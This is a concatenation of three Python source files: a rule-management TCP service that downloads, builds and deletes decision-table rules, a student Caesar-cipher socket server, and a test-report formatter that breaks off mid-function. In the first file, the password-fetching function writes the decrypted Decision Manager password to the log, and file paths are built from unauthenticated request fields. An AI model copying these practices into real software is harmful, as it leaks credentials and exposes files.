logger.system_log('LOSM12036', str(request['apply_user_id']), reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03219',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
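# Return the requested rule file (or the test-request Excel) as base64-encoded data.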
def download(request):
logger.logic_log('LOSI00001', 'manageid: %s, ruletypeid: %s' % (request['rule_manage_id'], request['ruletypeid']))
manageid = request['rule_manage_id']
ruletypeid = request['ruletypeid']
testrequestflag = request['file_name_expansion']
rule_file_id, rule_filename, rule_table_name, errmsg = _get_downloadfile_info(
ruletypeid, manageid, testrequestflag, request)
ret_info = {
'result': 'OK',
'msg': 'OK',
'filename': rule_filename,
'filedata': '',
}
if errmsg:
ret_info.update(
result='NG',
msg=errmsg,
filename='',
filedata='',
)
logger.system_log('LOSM12037', ruletypeid, manageid)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# When downloading the Excel file for test requests
if len(request['file_name_expansion']) > 0:
dtcomp = DecisionTableComponent(rule_table_name)
dtcomp.set_rule_type_id(ruletypeid)
dtcomp.set_path()
rule_filepath = dtcomp.get_dtable_path() + rule_filename
ret_info['filename'] = rule_filename
else:
# Read the rule file
rule_filepath = request['rule_filepath'] % (ruletypeid, rule_file_id) + rule_table_name + '/' + rule_filename
if os.path.exists(rule_filepath):
with open(rule_filepath, 'rb') as fp:
ruledata = base64.b64encode(fp.read()).decode('utf-8')
ret_info.update(filedata=ruledata)
else:
ret_info.update(
result='NG',
msg='MOSJA03304',
filename='',
filedata=''
)
logger.system_log('LOSM12038', rule_filepath)
logger.logic_log('LOSI00002', 'result: %s, msg: %s, filename: %s' %
(ret_info['result'], ret_info['msg'], ret_info['filename']))
return ret_info
def download_zip(request):
"""
[Overview]
Download a zip file that bundles the Excel file and the error log file.
"""
logger.logic_log('LOSI00001','manageid: %s, ruletypeid: %s' % (request['rule_manage_id'], request['ruletypeid']))
with DOWNLOAD_LOCK:
manageid = request['rule_manage_id']
ruletypeid = request['ruletypeid']
rule_file_id, rule_filename, rule_table_name, errmsg = _get_downloadfile_info(
ruletypeid, manageid, '', request=request)
ret_info = {
'result': 'OK',
'msg': 'OK',
'filename': rule_filename,
'filedata': '',
}
if errmsg:
ret_info.update(
result='NG',
msg=errmsg,
filename='',
filedata=''
)
logger.system_log('LOSM12037', ruletypeid, manageid)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# Set the Excel file path, the error log file path and the destination path
rule_filename_body = rule_filename.split('.')[0]
rule_filepath = request['rule_filepath'] % (ruletypeid, rule_file_id) + rule_table_name + '/' + rule_filename
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, rule_file_id)
errlog_filepath = dstpath + rule_filename_body + '_err.log'
# Build the zip file
zip_filename = rule_filename_body + '.zip'
filepath = _get_zipfile(rule_filepath, errlog_filepath, dstpath, zip_filename)
if os.path.exists(filepath):
# Read the zip file and return its data
with open(filepath, 'rb') as fp:
ruledata = base64.b64encode(fp.read()).decode('utf-8')
ret_info.update(
filename=zip_filename,
filedata=ruledata
)
else:
ret_info.update(
result='NG',
msg='MOSJA03304',
filename='',
filedata=''
)
logger.system_log('LOSM12038', filepath)
logger.logic_log('LOSI00002', 'result: %s, msg: %s, filename: %s' %
(ret_info['result'], ret_info['msg'], ret_info['filename']))
return ret_info
def _get_downloadfile_info(ruletypeid, manageid, testrequestflag, request):
"""
[Overview]
Fetch the information needed for the decision table, or for the zip bundling the decision table and the error log.
[Arguments]
ruletypeid : rule type id
manageid : rule manage id
[Return values]
rule_file_id : rule file id
rule_filename : rule file name
rule_table_name : rule table name
msg : error message
"""
disconnect()
# Fetch the rule type information
logger.logic_log('LOSI00001', 'ruletypeid: %s, manageid: %s' % (ruletypeid, manageid))
ruletype = ''
artifactid = ''
try:
ruletype = RuleType.objects.get(pk=ruletypeid)
artifactid = ruletype.artifact_id
rule_table_name = ruletype.rule_table_name
except BaseException:
logger.system_log('LOSM12039', ruletypeid, traceback.format_exc())
logger.logic_log('LOSI00002', "'', '', '', '', 'MOSJA03301'")
return '', '', '', 'MOSJA03301'
# Fetch the rule file information
try:
rule_file_id = RuleManage.objects.get(rule_manage_id=manageid).rule_file_id
rule_filename = RuleFile.objects.get(pk=rule_file_id).rule_file_name
# When downloading the Excel file for test requests
if len(testrequestflag) > 0:
rule_filename = rule_table_name + testrequestflag
except RuleManage.DoesNotExist:
logger.system_log('LOSM12040', manageid, traceback.format_exc())
logger.logic_log('LOSI00002', 'ruletypeid: %s' % ruletypeid)
return '', '', '', 'MOSJA03302'
except RuleFile.DoesNotExist:
logger.system_log('LOSM12041', rule_file_id, traceback.format_exc())
logger.logic_log('LOSI00002', 'ruletypeid: %s' % ruletypeid)
return '', '', '', 'MOSJA03303'
logger.logic_log('LOSI00002', 'rule_id: %s, rule_filename: %s, msg: None' % (rule_file_id, rule_filename))
return rule_file_id, rule_filename, rule_table_name, None
def _get_zipfile(rule_filepath, errlog_filepath, dstpath, filename):
"""
[Overview]
Create a zip file from the given paths and return the zip file path.
Files that do not exist are simply skipped when building the archive.
[Arguments]
rule_filepath : path of the rule file
errlog_filepath : path of the error log file
dstpath : destination path
filename : name of the file to save
"""
disconnect()
logger.logic_log('LOSI00001', 'rule_filepath: %s, errlog_filepath: %s, dstpath: %s, filename: %s' %
(rule_filepath, errlog_filepath, dstpath, filename))
filepath = dstpath + filename
# Delete the zip file if it already exists
if os.path.exists(filepath):
os.remove(filepath)
# Create the zip file
with zipfile.ZipFile(filepath, 'w', compression=zipfile.ZIP_DEFLATED) as new_zip:
if os.path.exists(errlog_filepath):
new_zip.write(errlog_filepath, arcname=os.path.basename(errlog_filepath))
if os.path.exists(rule_filepath):
new_zip.write(rule_filepath, arcname=os.path.basename(rule_filepath))
logger.logic_log('LOSI00002', 'filepath: %s' % filepath)
return filepath
def download_dt(request):
disconnect()
logger.logic_log('LOSI00001', request)
filename = ''
ruledata = ''
ruletypeid = int(request['ruletypeid'])
try:
ruletype = RuleType.objects.get(rule_type_id=ruletypeid)
except RuleType.DoesNotExist:
logger.system_log('LOSM12039', ruletypeid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03302',
'filename': '',
'filedata': '',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
dtcomp = DecisionTableComponent(ruletype.rule_table_name)
dtcomp.set_rule_type_id(ruletypeid)
dtcomp.set_path(src_path=rule_path['rule_srcpath'], root_path=('%s%s/' % (request['rule_rootpath'], ruletypeid)))
rule_filepath = dtcomp.get_dtable_path()
filename = '%s.xlsx' % (ruletype.rule_table_name)
# Read the rule file
filepath = rule_filepath + filename
if not os.path.exists(filepath):
ret_info = {
'result': 'NG',
'msg': 'MOSJA03304',
'filename': '',
'filedata': '',
}
logger.system_log('LOSM12038', filepath)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# Refresh the action type choices in the rule file
ruledata = None
try:
customizer = DecisionTableCustomizer(filepath)
customizer.custom_action_type()
ruledata = customizer.output()
except Exception as e:
logger.system_log('LOSM12065', 'error: %s' % e)
logger.logic_log('LOSI00005', traceback.format_exc())
if not ruledata:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03304',
'filename': '',
'filedata': '',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
ruledata = base64.b64encode(ruledata).decode('utf-8')
ret_info = {
'result': 'OK',
'msg': 'OK',
'filename': filename,
'filedata': ruledata,
}
logger.logic_log('LOSI00002', 'result: %s, msg: %s, filename: %s' %
(ret_info['result'], ret_info['msg'], ret_info['filename']))
return ret_info
def get_dm_conf():
"""
[Overview]
Fetch the Decision Manager settings.
[Return values]
protocol : str protocol
ipaddrport : str IP address and port
dmuser : str Decision Manager user name
dmpass : str Decision Manager password
"""
logger.logic_log('LOSI00001', 'None')
rset = list(System.objects.filter(category='DMSETTINGS').values('config_id', 'value'))
dmconf = {r['config_id']: r['value'] for r in rset}
# Decrypt the password
cipher = AESCipher(settings.AES_KEY)
dmconf['DM_PASSWD'] = cipher.decrypt(dmconf['DM_PASSWD'])
protocol = dmconf["DM_PROTOCOL"]
ipaddrport = dmconf["DM_IPADDRPORT"]
dmuser = dmconf["DM_USERID"]
dmpass = dmconf["DM_PASSWD"]
logger.logic_log(
'LOSI00002', '(protocol, ipaddrport, dmuser, dmpass) = (%s, %s, %s, %s)' %
(protocol, ipaddrport, dmuser, dmpass))
return protocol, ipaddrport, dmuser, dmpass
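# Delete a rule type: remove its KIE containers, on-disk artifacts and related DB records, then logically delete the RuleType row.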
def delete(request):
disconnect()
logger.logic_log('LOSI00001', request)
msg = ''
now = datetime.datetime.now(pytz.timezone('UTC'))
user_name = User.objects.get(user_id=request['user_id']).user_name
ret_info = {
'result': 'OK',
'msg': '',
}
try:
with transaction.atomic():
ruletypeid = int(request['ruletypeid'])
rule_type = RuleType.objects.select_for_update().get(rule_type_id=ruletypeid)
#########################################
# Delete containers
#########################################
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
# Fetch the container IDs
product_ContID = rule_type.current_container_id_product
staging_ContID = rule_type.current_container_id_staging
PROTOCOL, IPADDRPORT, dmuser, dmpass = get_dm_conf()
if product_ContID is not None:
HTTP2 = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, product_ContID)
response2 = requests.delete(HTTP2, headers=headers, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response2: %s, product_ContID: %s' % (response2, product_ContID))
if response2.status_code != 204 and response2.status_code != 404:
msg = 'MOSJA03607'
logger.system_log('LOSM12071', 'response2: %s, product_ContID: %s' % (response2, product_ContID))
raise Exception()
if staging_ContID is not None:
HTTP2 = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, staging_ContID)
response2 = requests.delete(HTTP2, headers=headers, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response2: %s, staging_ContID: %s' % (response2, staging_ContID))
if response2.status_code != 204 and response2.status_code != 404:
msg = 'MOSJA03607'
logger.system_log('LOSM12071', 'response2: %s, staging_ContID: %s' % (response2, staging_ContID))
raise Exception()
#########################################
# Delete the Maven repository directory
#########################################
dtcomp = DecisionTableComponent(rule_type.rule_table_name)
if ruletypeid > 0:
dtcomp.remove_mavenrepository()
#########################################
# Delete the decision table directory
#########################################
if ruletypeid > 0:
dtcomp.remove_component(ruletypeid)
#########################################
# Disable access permission records
#########################################
try:
ap_list = AccessPermission.objects.filter(rule_type_id=ruletypeid)
for a in ap_list:
a.disuse_flag = 1
a.last_update_user = user_name
a.last_update_timestamp = now
a.save(force_update=True)
except Exception as e:
msg = 'MOSJA03605'
logger.system_log('LOSM12066', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# Delete rule apply management records
#########################################
try:
RuleManage.objects.filter(rule_type_id=ruletypeid).delete()
except Exception as e:
msg = 'MOSJA03601'
logger.system_log('LOSM12042', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# Delete rule file management records
#########################################
try:
RuleFile.objects.filter(rule_type_id=ruletypeid).delete()
except Exception as e:
msg = 'MOSJA03602'
logger.system_log('LOSM12043', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# Delete data object management records
#########################################
try:
DataObject.objects.filter(rule_type_id=ruletypeid).delete()
except Exception as e:
msg = 'MOSJA03603'
logger.system_log('LOSM12044', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# Logically delete the rule type management record
#########################################
try:
rule_type.disuse_flag = 1
rule_type.rule_type_name = rule_type.rule_type_name + '_deleted_' + now.strftime('%Y%m%d%H%M%s')
rule_type.rule_table_name = rule_type.rule_table_name + '_deleted_' + now.strftime('%Y%m%d%H%M%s')
rule_type.last_update_user = user_name
rule_type.last_update_timestamp = now
rule_type.save(force_update=True)
except Exception as e:
msg = 'MOSJA03604'
logger.system_log('LOSM12045', ruletypeid, traceback.format_exc())
raise Exception()
except RuleType.DoesNotExist:
logger.system_log('LOSM12039', ruletypeid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03301',
}
except Exception as e:
if not msg:
logger.system_log('LOSM00001', traceback.format_exc())
msg = 'MOSJA03217'
ret_info = {
'result': 'NG',
'msg': msg,
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
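# Build the kjar with Maven under APPLY_LOCK, then hand off to apply() to deploy it.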
def build_kjar(request):
disconnect()
logger.logic_log('LOSI00001', request)
logger.logic_log('LOSI12001')
with APPLY_LOCK:
logger.logic_log('LOSI12002')
try:
# Fetch data
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
now_tz = conv_tz(now, time_zone)
user = User.objects.get(user_id=request['apply_user_id'])
ruletypeid = request['ruletypeid']
ruleid = request['rule_file_id']
artifactid = request['artifactid']
groupid = request['groupid']
filepath = request['pompath'] + 'pom.xml'
reqtypeid = request['request_type_id']
manageid = request['rule_manage_id']
rulefile = RuleFile.objects.get(rule_file_id=ruleid)
filename = '%s_err.log' % (rulefile.rule_file_name.rsplit('.')[0])
errfilepath = request['pompath'] + filename
userlog = 'user_id=' + str(request['apply_user_id'])
# Update the system processing status
try:
with transaction.atomic():
ruleManage = RuleManage.objects.select_for_update().get(rule_manage_id=manageid)
ruleManage.system_status = RULE_STS_SYSTEM.BUILD
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
except Exception as e:
RuleManage.objects.filter(
rule_manage_id=manageid
).update(
system_status=RULE_STS_SYSTEM.BUILD_NG, last_update_timestamp=now, last_update_user=user.user_name
)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03404', user.get_lang_mode()).replace('\\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12046', str(request['apply_user_id']),
reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03401',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# Edit the pom file
regex_groupid = r'<groupId>.*</groupId>'
regex_artifactid = r'<artifactId>.*</artifactId>'
regex_version = r'<version>.*</version>'
with open(filepath, 'r+') as fp:
pom_xml = fp.read()
pom_xml = re.sub(regex_groupid, '<groupId>%s</groupId>' % (groupid), pom_xml, 1)
pom_xml = re.sub(regex_artifactid, '<artifactId>%s</artifactId>' % (artifactid), pom_xml, 1)
pom_xml = re.sub(regex_version, '<version>%s</version>' % (ruleid), pom_xml, 1)
fp.seek(0)
fp.write(pom_xml)
fp.truncate()
# Run the build
exec_cmd = []
exec_cmd.append('mvn')
exec_cmd.append('install')
exec_cmd.append('-Ddrools.dateformat=yyyy-MM-dd HH:mm')
exec_cmd.append('-f')
exec_cmd.append(filepath)
ret = subprocess.run(exec_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Update the system processing status
sys_sts = RULE_STS_SYSTEM.BUILD_OK if ret.returncode == 0 else RULE_STS_SYSTEM.BUILD_NG
try:
with transaction.atomic():
ruleManage = RuleManage.objects.select_for_update().get(rule_manage_id=manageid)
ruleManage.system_status = sys_sts
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
except Exception as e:
RuleManage.objects.filter(
rule_manage_id=manageid).update(
system_status=RULE_STS_SYSTEM.BUILD_NG,
last_update_timestamp=now,
last_update_user=user.user_name)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03405', user.get_lang_mode()).replace('\\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12047', str(request['apply_user_id']),
reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03402',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
if ret.returncode != 0:
ruleManage.system_status = RULE_STS_SYSTEM.BUILD_NG
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03406', user.get_lang_mode()).replace('\\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + ret.stdout.decode("utf8") + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12048', str(request['apply_user_id']), reqtypeid, manageid, ret.returncode)
ret_info = {
'result': 'NG',
'msg': 'MOSJA03403',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
except User.DoesNotExist:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03101',
}
logger.system_log('LOSM12022', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
except RuleFile.DoesNotExist:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03013',
}
logger.system_log('LOSM12019', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
except Exception as e:
RuleManage.objects.filter(
rule_manage_id=manageid).update(
system_status=RULE_STS_SYSTEM.BUILD_NG,
last_update_timestamp=now,
last_update_user=user.user_name)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03406', user.get_lang_mode()).replace('\\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12048', str(request['apply_user_id']), reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03403',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
logger.logic_log('LOSI12003')
res = apply(request)
logger.logic_log('LOSI00002', 'res: %s' % res)
return res
# Fetch rule-file related paths
def load_filepath():
disconnect()
logger.logic_log('LOSI00001', 'None')
rule_path = {}
rule_path['rule_rootpath'] = ''
rule_path['rule_srcpath'] = ''
rule_path['rule_dstpath'] = ''
rule_path['rule_filepath'] = ''
# "System" != "os.system" | OASE_T_SYSTEM => System(model) class
system_list = System.objects.filter(Q(config_id='RULEFILE_ROOTPATH') |
Q(config_id='RULEFILE_SRCPATH'))
for system in system_list:
if system.config_id == 'RULEFILE_ROOTPATH':
rule_path['rule_rootpath'] = system.value
if not rule_path['rule_rootpath'].endswith('/'):
rule_path['rule_rootpath'] = '%s/' % (rule_path['rule_rootpath'])
rule_path['rule_dstpath'] = rule_path['rule_rootpath']
rule_path['rule_filepath'] = '%s%%s/%%s/%s' % (rule_path['rule_dstpath'], 'src/main/resources/com/oase/')
elif system.config_id == 'RULEFILE_SRCPATH':
rule_path['rule_srcpath'] = '%s%s' % (settings.BASE_DIR, system.value)
logger.logic_log('LOSI00002', 'rule_path: %s' % rule_path)
return rule_path
def load_settings():
"""
[Method overview]
Load the settings for the apply service.
"""
disconnect()
logger.logic_log('LOSI00001', 'None')
apply_settings = {}
apply_settings['host'] = '127.0.0.1'
apply_settings['port'] = 50001
rset = list(System.objects.filter(category='APPLYSETTINGS').values('config_id', 'value'))
for r in rset:
if r['config_id'] == 'APPLY_IPADDRPORT':
apval = r['value']
apval = apval.split(':')
if len(apval) == 2:
apply_settings['host'] = apval[0]
apply_settings['port'] = int(apval[1])
logger.logic_log('LOSI00002', 'apply_settings: %s' % apply_settings)
return apply_settings
if __name__ == '__main__':
logger.logic_log('LOSI00001', 'None')
apply_settings = load_settings()
host = apply_settings['host']
port = apply_settings['port']
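# Dispatch table: maps the 'request' field of an incoming JSON message to its handler, an optional follow-up thread and the keys to include in the response.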
func_info = {
'CREATE': {'func': create, 'thread': None, 'use_recv': False, 'need_keys': ['result', 'msg']},
'UPLOAD': {'func': upload, 'thread': build_kjar, 'use_recv': False, 'need_keys': ['result', 'msg']},
'APPLY': {'func': apply_req, 'thread': apply, 'use_recv': True, 'need_keys': ['result', 'msg']},
'DOWNLOAD' : {'func':download, 'thread':None, 'use_recv':False, 'need_keys':['result', 'msg', 'filename', 'filedata']},
'DOWNLOAD_ZIP': {'func':download_zip, 'thread':None, 'use_recv':False, 'need_keys':['result', 'msg', 'filename', 'filedata']},
'DOWNLOAD_DT' : {'func':download_dt, 'thread':None, 'use_recv':False, 'need_keys':['result', 'msg', 'filename', 'filedata']},
'DELETE': {'func': delete, 'thread': None, 'use_recv': False, 'need_keys': ['result', 'msg']},
}
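# Protocol sketch (illustrative example, not taken from the source): a client connects over TCP and sends one JSON object such as
#   {"request": "DOWNLOAD_DT", "ruletypeid": 1}
# and receives back a JSON object containing at least 'result' and 'msg'.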
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 8192)
sock.bind((host, port))
sock.listen(5)
logger.logic_log('LOSI12004')
while True:
try:
logger.logic_log('LOSI12005', host, port)
recv_data = bytes(b'')
clientsocket, (client_address, client_port) = sock.accept()
logger.logic_log('LOSI12006', client_address, client_port)
with clientsocket:
while True:
rcvtmp = clientsocket.recv(4096)
if not rcvtmp:
logger.logic_log('LOSI12013', len(recv_data))
break
recv_data = b'%s%s' % (recv_data, rcvtmp)
rule_path = load_filepath()
recv_data = recv_data.decode()
recv_data = json.loads(recv_data)
recv_data.update(rule_path)
need_keys = []
send_data = {}
if recv_data['request'] in func_info:
need_keys = func_info[recv_data['request']]['need_keys']
send_data = func_info[recv_data['request']]['func'](recv_data)
req_data = recv_data
if not func_info[recv_data['request']]['use_recv']:
req_data = make_send_data(send_data, omit_keys=['result', 'msg'])
req_data.update(rule_path)
if func_info[recv_data['request']]['thread']:
if 'result' in send_data and send_data['result'] == 'OK':
thrd = threading.Thread(
target=func_info[recv_data['request']]['thread'], args=(req_data,))
thrd.start()
else:
logger.system_log('LOSM12049', 'request: %s' % recv_data['request'])
need_keys = ['result', 'msg']
send_data = {
'result': 'NG',
'msg': 'MOSJA03001'
}
send_data = make_send_data(send_data, need_keys=need_keys)
ret_info = send_data
send_data = json.dumps(send_data)
send_data = send_data.encode()
clientsocket.sendall(send_data)
clientsocket.shutdown(socket.SHUT_RDWR)
clientsocket.close()
logger.logic_log('LOSI00002', 'result: %s, msg: %s' % (ret_info['result'], ret_info['msg']))
except Exception as e:
logger.system_log('LOSM12049', traceback.format_exc())
logger.logic_log('LOSI00002', 'apply_settings: %s' % apply_settings)
sock.close()
|
servidor.py
|
#!/usr/bin/env python3
'''
Practical Assignment 0: Computer Networks DCC023
Author: Hugo Araujo de Sousa (2013007463)
servidor.py: Receives a string from each client, decodes it and sends it back
to the client.
'''
import argparse as ap
import socket
import struct
import threading
import sys
# Add command line arguments.
parser = ap.ArgumentParser()
parser.add_argument('port_server', type=int, help='Server port')
args = parser.parse_args()
def decode_caesar(input_string, shift):
'''
Decodes a string encrypted with the Caesar Cipher.
@input_string: String to decode.
@shift: Unsigned integer that represents the number of shifts applied to
each character.
@return: String that represents the input string after Caesar Cipher
decoding.
'''
decoded = ''
for i in input_string:
temp = ord(i) - (shift % 26)
if temp < ord('a'):
decoded += chr(ord('z') + 1 + (temp % (- ord('a'))))
else:
decoded += chr(temp)
return decoded
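# Worked example (illustrative): encoding 'caesar' with a shift of 3 gives
# 'fdhvdu', so decode_caesar('fdhvdu', 3) returns 'caesar'. Characters that
# fall below 'a' wrap around to the end of the alphabet, e.g. with shift 3
# the letter 'a' decodes to 'x'.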
def recvall(socket, size):
'''
Receive all data of a certain size through a socket.
@socket: Socket object to receive data through.
@size: Total size of data to receive.
@return: The complete data received.
'''
data = b''
while len(data) < size:
msg = socket.recv(size - len(data))
if not msg:
return None
data += msg
return data
def handle_client(con):
'''
Handle a new client connection.
@con: Client socket.
'''
# Receive the string size from the client.
msg = recvall(con, 4)
if msg is None:
    return
string_size = struct.unpack('!i', msg)[0]
# Receive the encoded string from the client.
msg = recvall(con, string_size)
if msg is None:
    return
encoded_string = msg.decode('ascii')
# Receive the Caesar Cipher shift value from the client.
msg = recvall(con, 4)
if msg is None:
    return
caesar_shift = struct.unpack('!i', msg)[0]
decoded = decode_caesar(encoded_string, caesar_shift)
print(decoded)
sys.stdout.flush()
# Send decoded string back to client.
con.sendall(decoded.encode('ascii'))
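# A matching client (hypothetical sketch, not part of this file) would send,
# in order:
#   sock.sendall(struct.pack('!i', len(encoded)))  # 4-byte big-endian length
#   sock.sendall(encoded.encode('ascii'))          # Caesar-encoded string
#   sock.sendall(struct.pack('!i', shift))         # 4-byte big-endian shift
# and then read the decoded string back from the same connection.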
def main():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set timeout for recv.
rcv_timeo = struct.pack('ll', 15, 0)
server.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, rcv_timeo)
orig = ('', args.port_server)
server.bind(orig)
server.listen(1)
while True:
try:
con, client = server.accept()
except BlockingIOError:
continue
t = threading.Thread(target=handle_client, args=(con,))
t.start()
server.close()
if __name__ == '__main__':
    main()
|
command.py
|
# Copyright 2020 Katteli Inc.
# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import sys
import json
import time
import base64
import threading
from datetime import datetime
import testflows.settings as settings
import testflows._core.cli.arg.type as argtype
from testflows._core import __version__
from testflows._core.flags import Flags, SKIP
from testflows._core.testtype import TestType
from testflows._core.cli.arg.common import epilog
from testflows._core.cli.arg.common import HelpFormatter
from testflows._core.cli.arg.handlers.report.copyright import copyright
from testflows._core.transform.log.pipeline import ResultsLogPipeline
from testflows._core.utils.sort import human
from testflows._core.utils.timefuncs import localfromtimestamp, strftimedelta
from testflows._core.filters import The
from testflows._core.name import sep
from testflows._core.transform.log.report.totals import Counts
from testflows._core.cli.arg.handlers.handler import Handler as HandlerBase
logo = '<img class="logo" src="data:image/png;base64,%(data)s" alt="logo"/>'
testflows = '<span class="testflows-logo"></span> [<span class="logo-test">Test</span><span class="logo-flows">Flows</span>]'
testflows_em = testflows.replace("[", "").replace("]", "")
template = f"""
<section class="clearfix">%(logo)s%(confidential)s%(copyright)s</section>
---
# %(title)s Comparison Report
%(body)s
---
Generated by {testflows} Open-Source Test Framework
[<span class="logo-test">Test</span><span class="logo-flows">Flows</span>]: https://testflows.com
"""
class Formatter:
def format_logo(self, data):
if not data["company"].get("logo"):
return ""
data = base64.b64encode(data["company"]["logo"]).decode("utf-8")
return '\n<p>' + logo % {"data": data} + "</p>\n"
def format_confidential(self, data):
if not data["company"].get("confidential"):
return ""
return f'\n<p class="confidential">Document status - Confidential</p>\n'
def format_copyright(self, data):
if not data["company"].get("name"):
return ""
return (f'\n<p class="copyright">\n'
f'{copyright(data["company"]["name"])}\n'
"</p>\n")
def format_metadata(self, data):
metadata = data["metadata"]
s = (
"\n\n"
f"||**Date**||{localfromtimestamp(metadata['date']):%b %d, %Y %-H:%M}||\n"
f'||**Framework**||'
f'{testflows} {metadata["version"]}||\n'
)
if metadata.get("order-by"):
s += f'||**Order By**||{metadata["order-by"].capitalize()}||\n'
if metadata.get("sort"):
s += f'||**Sort**||{"Ascending" if metadata["sort"] == "asc" else "Descending"}||\n'
if metadata.get("filter"):
s += f'||**Filter**||{metadata["filter"]}||\n'
return s + "\n"
def format_reference(self, data):
table = data["table"]
s = "\n\n## Reference\n\n"
# reference table
s += " | ".join(table["reference"]["header"]) + "\n"
s += " | ".join(["---"] * len(table["reference"]["header"])) + "\n"
for row in table["reference"]["rows"]:
s += " | ".join(row) + "\n"
return s
def format_table(self, data):
table = data["table"]
s = "\n\n## Comparison\n\n"
# comparison table
s += " | ".join(table["header"]) + "\n"
s += " | ".join(["---"] * len(table["header"])) + "\n"
span = '<span class="result result-%(cls)s">%(name)s</span>'
for row in table["rows"]:
name, *results = row
s += " | ".join([name] + [
span % {'cls': result["result_type"].lower() if result else 'na', 'name': result["result_type"] if result else '-'} for result in results
]) + "\n"
return s
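# Illustrative output (assumed data): a row ["test A", {"result_type": "OK"}, None]
# renders as:
#   test A | <span class="result result-ok">OK</span> | <span class="result result-na">-</span>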
def format_chart(self, data):
script = """
window.onload = function() {
window.chart = c3.generate({
bindto: '#data-chart',
legend: {
position: 'inset',
inset: {
anchor: 'top-right',
x: 50,
y: -30,
step: 1
}
},
padding: {
top: 30
},
data: {
x: 'x',
columns: [
['x', %(values)s],
['OK', %(ok)s],
['Fail', %(fail)s],
['Known', %(known)s]
],
types: {
OK: 'area',
Fail: 'area',
Known: 'area',
// 'line', 'spline', 'step', 'area', 'area-step' are also available to stack
},
groups: [['OK', 'Fail', 'Known']],
colors: {
'OK': 'rgba(31, 239, 184, 0.7)',
'Fail': 'rgba(241, 88, 88, 0.7)',
'Known': 'rgba(137, 182, 239, 0.7)'
}
},
axis: {
x: {
type: 'category'
},
y: {
label: "Tests",
tick: {
format: function (d) {
return (parseInt(d) == d) ? d : null;
},
}
}
}
});
};
"""
script = script % {
"ok": ",".join([str(c) for c in data["chart"]["ok"]]),
"fail": ",".join([str(c) for c in data["chart"]["fail"]]),
"known": ",".join([str(c) for c in data["chart"]["known"]]),
